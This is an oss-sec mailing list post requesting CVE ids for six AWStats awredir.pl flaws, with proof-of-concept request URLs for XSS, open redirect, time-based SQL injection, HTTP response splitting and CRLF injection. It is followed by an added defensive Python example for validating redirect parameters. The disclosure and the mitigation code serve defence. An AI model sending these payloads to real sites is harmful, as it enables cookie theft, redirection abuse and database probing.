oss-sec mailing list archives
CVE Request -- Multiple security issues in various versions of AWStats
From: Jan Lieskovsky <jlieskov () redhat com>
Date: Fri, 07 Oct 2011 10:17:15 +0200
Hello Josh, Steve, vendors,

it doesn't look like CVE ids have already been assigned for:

[1] https://bugzilla.redhat.com/show_bug.cgi?id=740926#c0
[2] http://secunia.com/advisories/46160/
[3] http://seclists.org/fulldisclosure/2011/Sep/234
[4] http://websecurity.com.ua/5380/

If I counted correctly, six CVE ids should be assigned for these (since different versions are listed as vulnerable):

1) XSS (WASC-08) (in versions <=1.1):
http://site/awredir.pl?url=javascript:alert(document.cookie)

2) Redirector (URL Redirector Abuse in WASC 2.0) (WASC-38):
http://site/awredir.pl?url=http://websecurity.com.ua

3) SQL Injection (WASC-19) (version 1.2):
http://site/awredir.pl?url='%20and%20benchmark(10000,md5(now()))/*

4) XSS (WASC-08) (in version 1.2):
http://site/awredir.pl?url=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/awredir.pl?key=%3Cscript%3Ealert(document.cookie)%3C/script%3E

5) HTTP Response Splitting (WASC-25):
http://site/awredir.pl?key=04ed5362e853c72ca275818a7c0c5857&url=%0AHeader:1

6) CRLF Injection (Improper Input Handling in WASC 2.0) (WASC-20):
http://site/awredir.pl?key=4b9faa91e2529400c4f3c70833b4e4a5&url=%0AText

Could you allocate CVE identifiers for these? (Let me know if further description of each of the issues is necessary prior to assignment.)

Thank you && Regards, Jan.

--
Jan iankko Lieskovsky / Red Hat Security Response Team
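The six items above all come down to two request parameters of a redirector script, url and key, reaching a Location header, an HTML page or a database query without validation. The following is an added illustration, not code from AWStats or from the post, of how a redirector can validate those two parameters so that each class in the list is rejected: control characters (response splitting, CRLF injection), non-http(s) schemes such as javascript: (XSS), hosts outside an allowlist (open redirect), HTML-escaped reflection (XSS in the error page) and bound SQL parameters (SQL injection). The allowlisted hosts, the registered key/url pairs, the 32-hex-digit key shape and the "key authorizes url" design are assumptions made for the example.

```python
"""Defensive handling of a redirector's url/key parameters (added example,
not AWStats code).  Hosts, keys and the key->url registry are constructed."""
import html
import re
import sqlite3
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"stats.example.com", "www.example.com"}   # constructed allowlist

# Constructed (key, url) pairs standing in for whatever table a real
# redirector keeps.  The 32-hex-digit key shape is an assumption.
REGISTERED = [
    ("0123456789abcdef0123456789abcdef", "http://stats.example.com/"),
    ("fedcba9876543210fedcba9876543210", "https://www.example.com/docs"),
]


class InvalidParameter(ValueError):
    """Raised when a request parameter fails validation."""


def reject_control_chars(name, value):
    # CR, LF and other control characters must never reach a Location header:
    # that is the response-splitting / CRLF-injection vector in the report.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        raise InvalidParameter(f"{name}: control character not allowed")


def validate_url(url):
    reject_control_chars("url", url)
    parts = urlsplit(url)
    # A scheme allowlist rejects javascript:, data: and scheme-less input
    # (which is what a stray quote or a <script> tag parses as).
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise InvalidParameter("url: scheme not allowed")
    # A host allowlist turns an open redirector into a closed one.
    if parts.hostname not in ALLOWED_HOSTS:
        raise InvalidParameter("url: host not allowed")
    return url


def validate_key(key):
    reject_control_chars("key", key)
    if not re.fullmatch(r"[0-9a-f]{32}", key):
        raise InvalidParameter("key: expected 32 lowercase hex digits")
    return key


def make_registry():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE redirects (key TEXT PRIMARY KEY, url TEXT NOT NULL)")
    conn.executemany("INSERT INTO redirects VALUES (?, ?)", REGISTERED)
    return conn


def is_registered(conn, key, url):
    # Bound parameters: the values travel as data, so a quote or comment
    # sequence inside them cannot change the statement.
    row = conn.execute(
        "SELECT 1 FROM redirects WHERE key = ? AND url = ?", (key, url)
    ).fetchone()
    return row is not None


def handle_redirect(conn, params):
    """Return (status, headers, body) for an already URL-decoded query dict."""
    key = params.get("key", "")
    url = params.get("url", "")
    try:
        validate_key(key)
        validate_url(url)
        if not is_registered(conn, key, url):
            raise InvalidParameter("key does not match url")
    except InvalidParameter as exc:
        # Reflected input is HTML-escaped, so the error page cannot become
        # the XSS sink described in the report.
        body = (f"<p>Bad request: {html.escape(str(exc))}</p>"
                f"<p>url={html.escape(url)}</p>")
        return 400, [("Content-Type", "text/html; charset=utf-8")], body
    return 302, [("Location", url)], ""


if __name__ == "__main__":
    registry = make_registry()
    print(handle_redirect(registry, {"key": REGISTERED[0][0], "url": REGISTERED[0][1]}))
    print(handle_redirect(registry, {"key": REGISTERED[0][0], "url": "http://other.example.net/"}))
```

The order of checks matters: control characters are rejected on the raw string before urlsplit sees it, because recent Python versions silently strip tabs and newlines during parsing and would otherwise hide the injection attempt. The registry lookup runs last, after both values have a known shape, so even a value that survives validation is only ever passed to the database as a bound parameter.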